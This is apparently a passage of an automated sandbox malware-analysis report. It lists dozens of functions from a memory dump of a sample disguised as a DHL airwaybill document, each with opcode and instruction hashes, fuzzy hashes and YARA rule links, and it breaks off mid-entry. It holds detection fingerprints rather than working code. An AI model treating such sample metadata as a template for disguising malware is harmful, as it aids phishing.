                • Instruction ID: 17ce17f68a321bdc2a61970c4bcbf28622fc881a626f76dc91ce1149660e27ad
                • Opcode Fuzzy Hash: 0f264b81452e70bb402e706f48d5e62e5f932341b6f79f8a8b90c87bff7b9ad6
                • Instruction Fuzzy Hash: 3E51E572904712AFDB15DE78C894FABBBE8EBC4710F0145A9BA40DB150D7B4ED05C792
                Function 01BA8350 Relevance: .2, Instructions: 161COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 97d11e173db418803ab438dddaad26ed5ecc9b849a609da3d0516662fbb346b2
                • Instruction ID: 9ad3d49a978dd44ea4c16a30db78f7ce83d3f27e089b216c8b1b9f49cf73f9f0
                • Opcode Fuzzy Hash: 97d11e173db418803ab438dddaad26ed5ecc9b849a609da3d0516662fbb346b2
                • Instruction Fuzzy Hash: F051E370904705DFDB28CF5AC880A6BFBF8FF54710F50465EE29257AA0CB70A545CB90
                Function 01B3E443 Relevance: .2, Instructions: 158COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a557a1b4c8fe628f0950e2c42684a80bfbcb1b803453518c82fd7ace04af3c90
                • Instruction ID: 96035b8230f995d900fca9d34f8e3bb88bd892f891964e2fd18d36523e7ad70b
                • Opcode Fuzzy Hash: a557a1b4c8fe628f0950e2c42684a80bfbcb1b803453518c82fd7ace04af3c90
                • Instruction Fuzzy Hash: 0351AF71200A05EFCB2AEFA9C980F6AB3F9FF58754F4104AAE55197660E730ED50CB50
                Function 01BA4180 Relevance: .2, Instructions: 156COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b787b777806a9cc681013bbe300e2fc9737b816a9eaf94f63a7e54b5117b2079
                • Instruction ID: 145f5f0142c37d5b175680a6d9f83635c79fcf30306139bdebb11f297ec2200d
                • Opcode Fuzzy Hash: b787b777806a9cc681013bbe300e2fc9737b816a9eaf94f63a7e54b5117b2079
                • Instruction Fuzzy Hash: F55146716083429FD758DF29C880A6BBBE5FFC8204F884ABDF589C7250EB70D9058B52
                Function 01B245B1 Relevance: .2, Instructions: 156COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                • Instruction ID: 2f63ac8413027604cb8cc5db54399298bb74f59df1b09d6e1d2584ee89627c7b
                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                • Instruction Fuzzy Hash: F651C171E0022AABDF19DF94C440BEEBBB9EF45310F0440A9EA19EB250D774DD48CBA0
                Function 01B8E9E0 Relevance: .2, Instructions: 154COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                • Instruction ID: 16310737dcb7e18e1d00c7d3eb07f55d5b6c9f6e0492a25ad5aad76883a5007e
                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                • Instruction Fuzzy Hash: B6518771D0021AEFEF29BE94C8D4BAEBB75EB01B24F1546E5E612A7190D730DE40D7A0
                Function 01BC8B28 Relevance: .2, Instructions: 152COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e780730fbdf7983558eaa0aac6099a3dce5773fbc874e2be0ec336dfdd3b8085
                • Instruction ID: 64b93de187285e4faa78e11d409e8c461382ac8147edd2d036843fb4cb6d5b86
                • Opcode Fuzzy Hash: e780730fbdf7983558eaa0aac6099a3dce5773fbc874e2be0ec336dfdd3b8085
                • Instruction Fuzzy Hash: 9C4116707016119BEB2DDB2DC894B7BBB9AEF94B20F04829CF955C7290DB71D841C7A0
                Function 01B8CBF0 Relevance: .1, Instructions: 148COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a129c5f657a2fec2a53973670a64d16c0b40b451e9dd95954b9beacbb4349deb
                • Instruction ID: a0cec67a2b543177b4550f5db8168e93d8e1c656c4aa6b8ad5423e47b6d7007c
                • Opcode Fuzzy Hash: a129c5f657a2fec2a53973670a64d16c0b40b451e9dd95954b9beacbb4349deb
                • Instruction Fuzzy Hash: 89517EB5900216EFCB28EFA9C5809DEBFB9FB48754B55859AD905A3704D730AD01CFE0
                Function 01B3A430 Relevance: .1, Instructions: 139COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b95b872a49fd309c6793f814a38a6efc1664a62ef9d0f689eba964c1601e0381
                • Instruction ID: 86a6f29256786b174d51ee60dce4aa5eb46768f8706f2599a1e13958722d1892
                • Opcode Fuzzy Hash: b95b872a49fd309c6793f814a38a6efc1664a62ef9d0f689eba964c1601e0381
                • Instruction Fuzzy Hash: A541E475640201ABDF2DEF6DD881F6A7765EB94708F4101EDFE42EB246DB72D8208B60
                Function 01BCA9D3 Relevance: .1, Instructions: 139COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                • Instruction ID: 2521ae93b739e5eddf8d8810e41457bdf10f2c3e057d90f5c86c1f4db94bf054
                • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                • Instruction Fuzzy Hash: B541E67160171A9FDB2DCF7CC980A6AB7A9FF80614B0546AEFA5287644FB30ED04C790
                Function 01B301F8 Relevance: .1, Instructions: 138COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f976ea126c342fd5efdcb739cab18e25fb5c736165cd2dac2b2fdfe0302980da
                • Instruction ID: baf165cb875e39d5e96821b408c4b01498e381c615d050f5eec31b7eba5d457f
                • Opcode Fuzzy Hash: f976ea126c342fd5efdcb739cab18e25fb5c736165cd2dac2b2fdfe0302980da
                • Instruction Fuzzy Hash: 6041DF359002199BDF18EF98C880AEEB7B4FF98710F15829AF815E7240E7349C11CBA4
                Function 01B2EBFC Relevance: .1, Instructions: 138COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: acd01025d942aff04bd9b88b03af8c2af7c3888008b4f9b94700faf2beca5654
                • Instruction ID: 07ee44d9ca7fed951346effaec99efab25a322811bf9619d2bf320048168c1e6
                • Opcode Fuzzy Hash: acd01025d942aff04bd9b88b03af8c2af7c3888008b4f9b94700faf2beca5654
                • Instruction Fuzzy Hash: B741B2712043019FDB28DF69C880A67B7E9FF98224F1149AEE95BC7215DB35E848CB50
                Function 01B42750 Relevance: .1, Instructions: 137COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                • Instruction ID: d1b70354947d9ba30cece183518cfe87df7215360af64c7bcb208d03d5ede447
                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                • Instruction Fuzzy Hash: 6E517C75A00215DFCB59CFADC480AAEF7B2FF84710F2981A9D925A7351D770AE41CB90
                Function 01B06154 Relevance: .1, Instructions: 133COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b62ed53200148404292ff07e034e8699ae6b26151258bf2775a86a70d994987c
                • Instruction ID: 4cd4bfaabb3f0020ca0abc9988f2f99599f1575decfad3a83b9d257419b1a83b
                • Opcode Fuzzy Hash: b62ed53200148404292ff07e034e8699ae6b26151258bf2775a86a70d994987c
                • Instruction Fuzzy Hash: 9651B771940217DBEB2E9F68CC00BA8BBB5FF15314F1482E9E519972D5D734A991CF40
                Function 01B00BCD Relevance: .1, Instructions: 130COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: edeef3c181312094e2320ce12a47065b3e8ebbe44fc4c131d698a126e97c3920
                • Instruction ID: 71d5475306bf7d41ca0cde1c84e198b24d7df6cbd445210f32e6da837929fb77
                • Opcode Fuzzy Hash: edeef3c181312094e2320ce12a47065b3e8ebbe44fc4c131d698a126e97c3920
                • Instruction Fuzzy Hash: F6418435A002289BDF79EF68C940BEABBB4EF45750F4100E5E909AB281D774DE84CB91
                Function 01BC866E Relevance: .1, Instructions: 129COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                • Instruction ID: 2f07500b5b29ebf16a9e6c2adeffffad1c9b04e9d32e13a1f1c7f2426d95198a
                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                • Instruction Fuzzy Hash: FD417475B00105ABDF19DB99CC84ABFBBBAEF88A10F1440AEE50597351DB70DD0187A0
                Function 01B00887 Relevance: .1, Instructions: 128COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b29641bbe7a94f4a4f5f27a414ca34809d339867455285c391d855cc02376a1b
                • Instruction ID: f9720eb73c42198d3b2a35250c2e6051f81fa48e680933f22a3a63af85fe3315
                • Opcode Fuzzy Hash: b29641bbe7a94f4a4f5f27a414ca34809d339867455285c391d855cc02376a1b
                • Instruction Fuzzy Hash: 0B418FB16007019FE72AEF28C480A26BBF5FB49354B544AEEE54787A90E731E945CB90
                Function 01B2A470 Relevance: .1, Instructions: 127COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 172f8ec5fbb011e3573c1d4dfb458761c2fe3bc7514bcdd40a603ad752f4cd21
                • Instruction ID: e9ae4722e350cda43d6327384c3087b5ffb1100f9bcffa26e3fb0bfd4e31ee13
                • Opcode Fuzzy Hash: 172f8ec5fbb011e3573c1d4dfb458761c2fe3bc7514bcdd40a603ad752f4cd21
                • Instruction Fuzzy Hash: 5D41A031940225CFDF29DF68D8947AE7BB4FF18310F1406D9D419AB6A5DB38D944CBA0
                Function 01B08BF0 Relevance: .1, Instructions: 124COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2132954da934432a30c64bb5d855ed6e2784c05c798748fc574a76b14a2b6ab4
                • Instruction ID: 58854dce5efda7e35153d9b14a5df973ebc0e831ed5b6cbeb879e944955488f9
                • Opcode Fuzzy Hash: 2132954da934432a30c64bb5d855ed6e2784c05c798748fc574a76b14a2b6ab4
                • Instruction Fuzzy Hash: 4141F531E01202CBDB2EAF48C880AABBFB5FB94704F1582ADD5095B295C735DA41CB90
                Function 01AF8918 Relevance: .1, Instructions: 123COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5b5334197cc4026446a92543ba1fdc480e38bb6108a70dbbb513d76305e7494c
                • Instruction ID: e882c12ac7fc71185e9be5a8f18c295a8e13608e0cc76b97bd42f469f9c67ee7
                • Opcode Fuzzy Hash: 5b5334197cc4026446a92543ba1fdc480e38bb6108a70dbbb513d76305e7494c
                • Instruction Fuzzy Hash: 8941AB315083069ED712DF68C980B6BB7E9EF84B54F40096EFA84D7250E730CE088BA3
                Function 01AFA020 Relevance: .1, Instructions: 122COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                • Instruction ID: b567eca8aee32c1dd76969b830b4ace955b1ed2f05c0664d9a80621a25eea4dd
                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                • Instruction Fuzzy Hash: BC412C31A00311EBDB19EF9995507FABB72EB50764F1580AEFF499B240D7369D40CB90
                Function 01B009AD Relevance: .1, Instructions: 122COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c9d77693cb134a8aa3e5a2727283af3e62948d0920fa53e3fe7402e95a82d9c1
                • Instruction ID: a1c58f3181ee6f75d36a594b533d5b1c6e92c917b965a25d588be1a2f23a85b6
                • Opcode Fuzzy Hash: c9d77693cb134a8aa3e5a2727283af3e62948d0920fa53e3fe7402e95a82d9c1
                • Instruction Fuzzy Hash: 58419F71600701EFD72ADF18C840B26BBF4FF58354F6186AAE449CB291E770E941CB90
                Function 01B30710 Relevance: .1, Instructions: 121COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                • Instruction ID: bb1357a452dbe040c9b29747511b726d1f8f0ce839942503d8b1a5caf34bf589
                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                • Instruction Fuzzy Hash: 21415C71A00705EFDB29DF98C980AAABBF8FF58700B1049ADE556D7250D330EA54CF90
                Function 01B0262C Relevance: .1, Instructions: 119COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1f2179f64a533130241d6557431ffac733dd729817bbbd2a436e59dd4c8dbcc3
                • Instruction ID: 5935d535714e46ef1598d51fe3a0d3424f81079701f6d87b828b2d2f673a051a
                • Opcode Fuzzy Hash: 1f2179f64a533130241d6557431ffac733dd729817bbbd2a436e59dd4c8dbcc3
                • Instruction Fuzzy Hash: E6418F71901701DFCB2AEF68C944765BBB1FF58310F1082EED9169B2E1EB30A949CB51
                Function 01B3C8F9 Relevance: .1, Instructions: 116COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8e9e7c0a63e0570953d240c7854524cc4ad7b8930c9c948ac8a412e58f7c3b06
                • Instruction ID: 408bae7b50cdcf01acbb69ac9face8adf0cd337253a949ffb3b9d427c6114c2d
                • Opcode Fuzzy Hash: 8e9e7c0a63e0570953d240c7854524cc4ad7b8930c9c948ac8a412e58f7c3b06
                • Instruction Fuzzy Hash: 603177B2A00345DFDB5ACFA8C440799BBF4EB49724F2181EED519EB251D7729902CB90
                Function 01B807C3 Relevance: .1, Instructions: 114COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6496a28ac3dcfdb686fce287a16739268d70fccd4e5a659c90ff7490367f8750
                • Instruction ID: 47d1691105ad4b971bf404a970c02fdf298b8ba8e848afd747e5aae1e12f4a20
                • Opcode Fuzzy Hash: 6496a28ac3dcfdb686fce287a16739268d70fccd4e5a659c90ff7490367f8750
                • Instruction Fuzzy Hash: 8741AD71508301AFD724EF29C845B9BBBE8FF88654F004A6EF998D7251D7709944CB92
                Function 01AF80A0 Relevance: .1, Instructions: 111COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bcf94cf37c28208012415fa542e49bc455a3e28a101053487c3d1233ca325847
                • Instruction ID: 8dfd79f43f32017c7361d8ff7982f33062d58d23e5a0ae9b8cc7c169d9656b6b
                • Opcode Fuzzy Hash: bcf94cf37c28208012415fa542e49bc455a3e28a101053487c3d1233ca325847
                • Instruction Fuzzy Hash: C141E171A05716AFDB15DF98C940AA8BBB1FF04760F24836DEA15A7280DB38ED418B94
                Function 01B805A7 Relevance: .1, Instructions: 111COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a65f7baf0e7e6e02af310cc0b14bbd4154ce465e0711a3b2a454686971fbec80
                • Instruction ID: 0da292513173044d4d5091c27c8ffce9f5783c142c597b4ef3f0b5c2f53218ac
                • Opcode Fuzzy Hash: a65f7baf0e7e6e02af310cc0b14bbd4154ce465e0711a3b2a454686971fbec80
                • Instruction Fuzzy Hash: F441E4725086429FD328EF68C880A7AB7E5FFC8B40F14465DF99487690E730D908C7A6
                Function 01B04859 Relevance: .1, Instructions: 111COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a6ddf3e42c170c541999aed256b62a5f8b0618392d40840038e16b41be2f09fb
                • Instruction ID: 2ea6a75a371bdc9991e66a951a322aa17c7dd8756860dd43e3202f1f120888b6
                • Opcode Fuzzy Hash: a6ddf3e42c170c541999aed256b62a5f8b0618392d40840038e16b41be2f09fb
                • Instruction Fuzzy Hash: CF4191706003029FDB2ADF18D884B2ABFE9EF81354F1549BDEA45872E1DB30D941CB51
                Function 01AF8B50 Relevance: .1, Instructions: 111COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c51e3804b6df8ff7c66427c33e84a0b5bce52adefe1efa707d73bd8a9371bc95
                • Instruction ID: 8469df6f59279d5fc894c623109fbf672d6250966741e4ab32c368d108f19f7e
                • Opcode Fuzzy Hash: c51e3804b6df8ff7c66427c33e84a0b5bce52adefe1efa707d73bd8a9371bc95
                • Instruction Fuzzy Hash: ED417471E01605DFCF15DFA9C9806ADB7F1FF98320B14856EE556E7260D7389941CB40
                Function 01B102E1 Relevance: .1, Instructions: 106COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                • Instruction ID: 9f3e3a241ab472f156b008e90ab714055de711795ae96419b10fd2ae48a412ee
                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                • Instruction Fuzzy Hash: 57312931A04644AFDB169B68CC80B9BBFE8EF18350F0546E5F415D7396C774D984CBA0
                Function 01BAE3DB Relevance: .1, Instructions: 105COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 44e388a7fb1d56a8a38fda96cae50ec0b34316264c8c70c40bc1b8155ba9ab46
                • Instruction ID: dfbcceb055619fcaf5b2336554e772c4f8fe32fe70cd9d65e1ef430b1e6ea7c0
                • Opcode Fuzzy Hash: 44e388a7fb1d56a8a38fda96cae50ec0b34316264c8c70c40bc1b8155ba9ab46
                • Instruction Fuzzy Hash: 2431C835740716ABDB2A9F559C41FAF7AB8EF58B50F4100A8F604AB291DBA4DD01C7E0
                Function 01BB4B4B Relevance: .1, Instructions: 104COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 82a129b28be43d76137f9893f1508d987523dc70e7683ed43ed6e9607e0e462f
                • Instruction ID: 5ba3ee8c7e0b828c28790ed3c8fa16e86e2c67b6d4b3d2cf44d59a59e0f82c49
                • Opcode Fuzzy Hash: 82a129b28be43d76137f9893f1508d987523dc70e7683ed43ed6e9607e0e462f
                • Instruction Fuzzy Hash: 9631E6322052019FC739DF1DD8C0EB6B7E5FB84760F1A44ADE9968BA56DB71E800CB91
                Function 01B04260 Relevance: .1, Instructions: 102COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 87451d06ea763366bcd8300853462aa1b98aa3fe16faa0f7be32ed8fe4fc7361
                • Instruction ID: 2ba51ede1041f1e6092991c71c905065f659debfde4f1a48e108a7f8002c666e
                • Opcode Fuzzy Hash: 87451d06ea763366bcd8300853462aa1b98aa3fe16faa0f7be32ed8fe4fc7361
                • Instruction Fuzzy Hash: 0341BD31200B459FCB2ADF69C880BD67BE8FF54714F0088ADF69A8B290D734E804CB90
                Function 01BB4BB0 Relevance: .1, Instructions: 101COMMON
                Download Yara Rule
                Memory Dump Source
